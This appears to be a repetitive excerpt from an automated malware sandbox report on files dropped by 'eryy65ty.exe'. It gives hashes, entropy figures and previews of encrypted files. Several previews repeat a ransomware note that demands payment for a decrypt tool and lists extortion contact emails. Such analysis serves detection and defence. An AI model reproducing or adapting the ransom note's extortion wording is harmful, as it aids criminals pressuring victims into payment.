                                                                                                                                            Entropy (8bit):7.853382632902512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2O0ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUym:b+AKjhCpA760kla9SKUym
                                                                                                                                            MD5:3451E32CE4CDE47EB805073B7359100E
                                                                                                                                            SHA1:FDE357B6CFD23D565522B68801302CBA35DECD44
                                                                                                                                            SHA-256:3F53DA956E36562C9A2822EA34A4F3146F7D6A465ECF9E60182BFCE81595F135
                                                                                                                                            SHA-512:09CE5762B0106D0C5C93A5FECE06808091F3F8CF7637FC869A3180750B9B28C84DA0CF49599256BBFB7CC7129E831AE19DE48E20FD52A08DAAA52C43486D33E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.T..~.Q.y}.]...(.....G./U!.RS.Y...f...T]..R.....p.>j.B.<....K..Bg...c.( ~.uf.oG.0a.=tuN...z..:.\..w....l.x.5.:\"!U..c..m.i.E$..;akf.K...b........O.........d.;s/.b..u...t.EO.f...[...Mp.}..|0.`.....w{...$!.zo..t...w.m...&..T..-..5D[.O}.I.0..uG.+l.....).%q......66N.....WV7.j...I.c..>.!...L...:.|.._v...D..."M......L......)..-.Q..P...].!-..1...:......F.<..X:Ra..g..p..:..*,j...G..?.....3..y....bW.%..0e]..}Q..8....k.AK..c).QO..$.I"Z........P.......59..T).0.I....0..|7....6.;po.......?..p".@B....W.....v.c.8.W......`.....2..L.=.\.K+.=.Nwk.....E......I\-0xc.wM.lr..y7\.J..PG.,..h./$,-....jI.......M.4.bF.r....W......2...v.....d......S.[...BA.....$'"..\..5O...H..r0..........1.(*.._Xs.v..[.3.....&.E.#.6..t*.db.=..........P.w....b..L..x.t!.d.A.@l....4.C..\F0....j..s.F.{. <.p...%_.N.{.....@.....)....e=...%{.5....f."T....:.z8..<)...........+.H.>.lUR.....(..?...g.:.N.V.l.. .[r\...S....s#'.E]..`UJ.Sk....Q..gOj.$.h...2Z&....#2.M.h{./I.)."..W:B.C_..j/.Ix.2
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67975
                                                                                                                                            Entropy (8bit):7.853382632902512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2O0ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUym:b+AKjhCpA760kla9SKUym
                                                                                                                                            MD5:3451E32CE4CDE47EB805073B7359100E
                                                                                                                                            SHA1:FDE357B6CFD23D565522B68801302CBA35DECD44
                                                                                                                                            SHA-256:3F53DA956E36562C9A2822EA34A4F3146F7D6A465ECF9E60182BFCE81595F135
                                                                                                                                            SHA-512:09CE5762B0106D0C5C93A5FECE06808091F3F8CF7637FC869A3180750B9B28C84DA0CF49599256BBFB7CC7129E831AE19DE48E20FD52A08DAAA52C43486D33E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.T..~.Q.y}.]...(.....G./U!.RS.Y...f...T]..R.....p.>j.B.<....K..Bg...c.( ~.uf.oG.0a.=tuN...z..:.\..w....l.x.5.:\"!U..c..m.i.E$..;akf.K...b........O.........d.;s/.b..u...t.EO.f...[...Mp.}..|0.`.....w{...$!.zo..t...w.m...&..T..-..5D[.O}.I.0..uG.+l.....).%q......66N.....WV7.j...I.c..>.!...L...:.|.._v...D..."M......L......)..-.Q..P...].!-..1...:......F.<..X:Ra..g..p..:..*,j...G..?.....3..y....bW.%..0e]..}Q..8....k.AK..c).QO..$.I"Z........P.......59..T).0.I....0..|7....6.;po.......?..p".@B....W.....v.c.8.W......`.....2..L.=.\.K+.=.Nwk.....E......I\-0xc.wM.lr..y7\.J..PG.,..h./$,-....jI.......M.4.bF.r....W......2...v.....d......S.[...BA.....$'"..\..5O...H..r0..........1.(*.._Xs.v..[.3.....&.E.#.6..t*.db.=..........P.w....b..L..x.t!.d.A.@l....4.C..\F0....j..s.F.{. <.p...%_.N.{.....@.....)....e=...%{.5....f."T....:.z8..<)...........+.H.>.lUR.....(..?...g.:.N.V.l.. .[r\...S....s#'.E]..`UJ.Sk....Q..gOj.$.h...2Z&....#2.M.h{./I.)."..W:B.C_..j/.Ix.2
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67975
                                                                                                                                            Entropy (8bit):7.853382632902512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2O0ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUym:b+AKjhCpA760kla9SKUym
                                                                                                                                            MD5:3451E32CE4CDE47EB805073B7359100E
                                                                                                                                            SHA1:FDE357B6CFD23D565522B68801302CBA35DECD44
                                                                                                                                            SHA-256:3F53DA956E36562C9A2822EA34A4F3146F7D6A465ECF9E60182BFCE81595F135
                                                                                                                                            SHA-512:09CE5762B0106D0C5C93A5FECE06808091F3F8CF7637FC869A3180750B9B28C84DA0CF49599256BBFB7CC7129E831AE19DE48E20FD52A08DAAA52C43486D33E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.T..~.Q.y}.]...(.....G./U!.RS.Y...f...T]..R.....p.>j.B.<....K..Bg...c.( ~.uf.oG.0a.=tuN...z..:.\..w....l.x.5.:\"!U..c..m.i.E$..;akf.K...b........O.........d.;s/.b..u...t.EO.f...[...Mp.}..|0.`.....w{...$!.zo..t...w.m...&..T..-..5D[.O}.I.0..uG.+l.....).%q......66N.....WV7.j...I.c..>.!...L...:.|.._v...D..."M......L......)..-.Q..P...].!-..1...:......F.<..X:Ra..g..p..:..*,j...G..?.....3..y....bW.%..0e]..}Q..8....k.AK..c).QO..$.I"Z........P.......59..T).0.I....0..|7....6.;po.......?..p".@B....W.....v.c.8.W......`.....2..L.=.\.K+.=.Nwk.....E......I\-0xc.wM.lr..y7\.J..PG.,..h./$,-....jI.......M.4.bF.r....W......2...v.....d......S.[...BA.....$'"..\..5O...H..r0..........1.(*.._Xs.v..[.3.....&.E.#.6..t*.db.=..........P.w....b..L..x.t!.d.A.@l....4.C..\F0....j..s.F.{. <.p...%_.N.{.....@.....)....e=...%{.5....f."T....:.z8..<)...........+.H.>.lUR.....(..?...g.:.N.V.l.. .[r\...S....s#'.E]..`UJ.Sk....Q..gOj.$.h...2Z&....#2.M.h{./I.)."..W:B.C_..j/.Ix.2
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):112129
                                                                                                                                            Entropy (8bit):7.710813556755185
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:pOIUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcp1:ptfAZsVFF0gOjymdY5
                                                                                                                                            MD5:565C60383561767CBAE08EE3F7203D45
                                                                                                                                            SHA1:660307BEEC5D01A31E663E96FB5F69AE44750424
                                                                                                                                            SHA-256:4459852B8C2BD22DEBD6E6CD03CC133F56063FF92BC28741C2C1355C63F13855
                                                                                                                                            SHA-512:BCB1C0968EC9A1CBA6D1587EB7E27CE47076658159D254823D67FD5F182EF2B71F073EA7C3013C9A9CE1A6EC79562EC70B0D962B3DBCB394ECD0DCA04FDFD745
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.(.....:r...M..#3..z..J.~:Q.V.*...m;.@.....'..k.Ir.Ue....[.h....Y..l....A>6.LuV0.{....+...2.}....`../..]2t...... ..&.}\.......B..4...fdiym#...A.cf.c..M%;k.y^..r./w.....";...4..Y@=n.Y.tO.../.u.+.......z...'Q....?...x...2.)}....{3..'.........V".4f.\...B...D.U.....5=.<..V.K.g..tW..^Z..f@.;9.hW.C|8.>...j..8.DN......8.....#.M..qV....e.....RoX...'! .b5..<4..U....3...T$....5+..v...=............/.^4!...:*I..}u......G.5.*...t1.P6..,P...C{..M\.H.3.2.Y.....1K0v...`...|g...b.D/.....)n'...I,*C.T...'c.N....k.}.........hh.......K.J`.2?z.L...1.....a3P...*.o..R..,k.d....i.H\..(fo..%V...C.l&I.!.&.....j."...7W.e`.Ih...p.F....(....K'...5.(..H..!.g$..z.d........p&.ht.x..8@.GcX....z(..s]C'....U...0.g.H.u...8!.o..#...bU..N\K..~y%........ ..P3..P..N...D<..6..o..G.E@..d!O....)..".{.]..9L..=..:..O..^...!.J..R...Wf..O'....L..Q......!..?]k...s1..La@.Y..|f2l..0.`.8;....0.............o.k..K..;..?.S..O..x....ix.:.1..D.`...Lv..+0.2.......p.....{g.>..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):112129
                                                                                                                                            Entropy (8bit):7.710813556755185
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:pOIUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcp1:ptfAZsVFF0gOjymdY5
                                                                                                                                            MD5:565C60383561767CBAE08EE3F7203D45
                                                                                                                                            SHA1:660307BEEC5D01A31E663E96FB5F69AE44750424
                                                                                                                                            SHA-256:4459852B8C2BD22DEBD6E6CD03CC133F56063FF92BC28741C2C1355C63F13855
                                                                                                                                            SHA-512:BCB1C0968EC9A1CBA6D1587EB7E27CE47076658159D254823D67FD5F182EF2B71F073EA7C3013C9A9CE1A6EC79562EC70B0D962B3DBCB394ECD0DCA04FDFD745
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.(.....:r...M..#3..z..J.~:Q.V.*...m;.@.....'..k.Ir.Ue....[.h....Y..l....A>6.LuV0.{....+...2.}....`../..]2t...... ..&.}\.......B..4...fdiym#...A.cf.c..M%;k.y^..r./w.....";...4..Y@=n.Y.tO.../.u.+.......z...'Q....?...x...2.)}....{3..'.........V".4f.\...B...D.U.....5=.<..V.K.g..tW..^Z..f@.;9.hW.C|8.>...j..8.DN......8.....#.M..qV....e.....RoX...'! .b5..<4..U....3...T$....5+..v...=............/.^4!...:*I..}u......G.5.*...t1.P6..,P...C{..M\.H.3.2.Y.....1K0v...`...|g...b.D/.....)n'...I,*C.T...'c.N....k.}.........hh.......K.J`.2?z.L...1.....a3P...*.o..R..,k.d....i.H\..(fo..%V...C.l&I.!.&.....j."...7W.e`.Ih...p.F....(....K'...5.(..H..!.g$..z.d........p&.ht.x..8@.GcX....z(..s]C'....U...0.g.H.u...8!.o..#...bU..N\K..~y%........ ..P3..P..N...D<..6..o..G.E@..d!O....)..".{.]..9L..=..:..O..^...!.J..R...Wf..O'....L..Q......!..?]k...s1..La@.Y..|f2l..0.`.8;....0.............o.k..K..;..?.S..O..x....ix.:.1..D.`...Lv..+0.2.......p.....{g.>..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):715
                                                                                                                                            Entropy (8bit):7.685874243538719
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:b0VssQzLWuNSMBe6O3zLQcATBv/zErsr1po2ookwIYWm3o0MhJn:H5rc3xYv/oYrc2oXK13/6
                                                                                                                                            MD5:2842F9F9A5B8C04AD819BF489F4C9066
                                                                                                                                            SHA1:5B72DC020FA39FA308B670CDC4D6C731988A1062
                                                                                                                                            SHA-256:A69288F9E3B2A921F6A5949A9ED454E2A3E08B01DA1D086CBB62C366BC549BAC
                                                                                                                                            SHA-512:9081DC5670AABE89AD9A4475BBA74181015DF1A6D47DCDEBC875E02B35A8D3A0F6B1EFD77C3ED8391B79E634DDD58167E62CA4250E7799ADCA9EA2DA043BAD69
                                                                                                                                            Malicious:true
                                                                                                                                            Preview::.$".Z\ .Qq..CB E.... Gs.s..&}z/i.=.......b..b].BK.b0\.-..h..Q.k.`.......e.e] . \^.G%.+..yQ.....r..3.{_..^9?y../F.....KU..sq.....)[...R....{0.^..D.~.{....E.%..o.9.0..t..}.F-...:.......^..q...<.):N7...."..\.*.M.w.....0..a.F.8 .[..Z......b....m..Y.V..).o...%..Z.5.)Pq....vv..!=.V.3...J..2.%.y..0.5(f...t...]....p-e(..^=.E..l..s^..>..+%:yj..(....t.....X....lk.....v...t....h{.6g.g3...7.x..>l..v......c...4..kw/..f.i..-3*......qB..N..C..|d.......~..VyG{...L1...$ .....U.k?r.;.y.}c...!9.C.W...o............!....s...D..>....;O.a.{F6.V...f..ONT.]...g.2|.....T. ...V..Lo....5.2F.?.?....u....X..~....U.>...]1n...[...b1.......?.....:.R)...m..>........~E...nV...5...p.....]bc..!0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):715
                                                                                                                                            Entropy (8bit):7.685874243538719
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:b0VssQzLWuNSMBe6O3zLQcATBv/zErsr1po2ookwIYWm3o0MhJn:H5rc3xYv/oYrc2oXK13/6
                                                                                                                                            MD5:2842F9F9A5B8C04AD819BF489F4C9066
                                                                                                                                            SHA1:5B72DC020FA39FA308B670CDC4D6C731988A1062
                                                                                                                                            SHA-256:A69288F9E3B2A921F6A5949A9ED454E2A3E08B01DA1D086CBB62C366BC549BAC
                                                                                                                                            SHA-512:9081DC5670AABE89AD9A4475BBA74181015DF1A6D47DCDEBC875E02B35A8D3A0F6B1EFD77C3ED8391B79E634DDD58167E62CA4250E7799ADCA9EA2DA043BAD69
                                                                                                                                            Malicious:false
                                                                                                                                            Preview::.$".Z\ .Qq..CB E.... Gs.s..&}z/i.=.......b..b].BK.b0\.-..h..Q.k.`.......e.e] . \^.G%.+..yQ.....r..3.{_..^9?y../F.....KU..sq.....)[...R....{0.^..D.~.{....E.%..o.9.0..t..}.F-...:.......^..q...<.):N7...."..\.*.M.w.....0..a.F.8 .[..Z......b....m..Y.V..).o...%..Z.5.)Pq....vv..!=.V.3...J..2.%.y..0.5(f...t...]....p-e(..^=.E..l..s^..>..+%:yj..(....t.....X....lk.....v...t....h{.6g.g3...7.x..>l..v......c...4..kw/..f.i..-3*......qB..N..C..|d.......~..VyG{...L1...$ .....U.k?r.;.y.}c...!9.C.W...o............!....s...D..>....;O.a.{F6.V...f..ONT.]...g.2|.....T. ...V..Lo....5.2F.?.?....u....X..~....U.>...]1n...[...b1.......?.....:.R)...m..>........~E...nV...5...p.....]bc..!0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
